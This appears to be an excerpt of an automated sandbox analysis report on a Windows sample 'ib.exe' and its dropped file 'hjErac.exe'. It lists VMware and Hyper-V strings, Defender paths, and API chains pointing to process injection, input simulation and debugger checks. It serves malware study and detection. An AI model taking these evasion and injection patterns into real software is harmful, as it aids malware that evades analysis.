Source: Amcache.hve.2.dr |
Binary or memory string: VMware20,1hbin@ |
Source: Amcache.hve.2.dr |
Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563 |
Source: Amcache.hve.2.dr |
Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: Amcache.hve.2.dr |
Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys |
Source: hjErac.exe, 00000002.00000003.1697547735.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.0000000000A63000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000003.1697547735.0000000000A0B000.00000004.00000020.00020000.00000000.sdmp, hjErac.exe, 00000002.00000002.1888644976.00000000009EE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: Amcache.hve.2.dr |
Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.2.dr |
Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev |
Source: Amcache.hve.2.dr |
Binary or memory string: c:/windows/system32/drivers/vmci.sys |
Source: Amcache.hve.2.dr |
Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000 |
Source: ib.exe, 00000000.00000002.4134137721.00000000009FE000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: Amcache.hve.2.dr |
Binary or memory string: vmci.sys |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0 |
Source: Amcache.hve.2.dr |
Binary or memory string: vmci.syshbin` |
Source: Amcache.hve.2.dr |
Binary or memory string: \driver\vmci,\driver\pci |
Source: Amcache.hve.2.dr |
Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000 |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware20,1 |
Source: Amcache.hve.2.dr |
Binary or memory string: Microsoft Hyper-V Generation Counter |
Source: Amcache.hve.2.dr |
Binary or memory string: NECVMWar VMware SATA CD00 |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware Virtual disk SCSI Disk Device |
Source: Amcache.hve.2.dr |
Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom |
Source: Amcache.hve.2.dr |
Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk |
Source: Amcache.hve.2.dr |
Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware PCI VMCI Bus Device |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware VMCI Bus Device |
Source: Amcache.hve.2.dr |
Binary or memory string: VMware Virtual RAM |
Source: Amcache.hve.2.dr |
Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1 |
Source: Amcache.hve.2.dr |
Binary or memory string: vmci.inf_amd64_68ed49469341f563 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
API call chain: ExitProcess graph end node |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_003E31A6 |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E3308 SetUnhandledExceptionFilter, |
0_2_003E3308 |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E31A6 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
0_2_003E31A6 |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E2CCC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
0_2_003E2CCC |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E22C0 OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,GetLastError,GetLastError,GetLastError,_printf,WaitForSingleObject,CloseHandle, |
0_2_003E22C0 |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event, |
0_2_003E1670 |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E1670 keybd_event,SendInput,keybd_event,keybd_event,mouse_event,keybd_event,keybd_event,keybd_event,keybd_event, |
0_2_003E1670 |
Source: SciTE.exe.2.dr |
Binary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX |
Source: C:\Users\user\Desktop\ib.exe |
Code function: 0_2_003E3096 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, |
0_2_003E3096 |
Source: C:\Users\user\AppData\Local\Temp\hjErac.exe |
Code function: 2_2_00CB139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId, |
2_2_00CB139F |
Source: Amcache.hve.2.dr |
Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe |
Source: Amcache.hve.2.dr |
Binary or memory string: msmpeng.exe |
Source: Amcache.hve.2.dr |
Binary or memory string: c:\program files\windows defender\msmpeng.exe |
Source: Amcache.hve.2.dr |
Binary or memory string: MsMpEng.exe |
Source: Yara match |
File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: hjErac.exe PID: 6996, type: MEMORYSTR |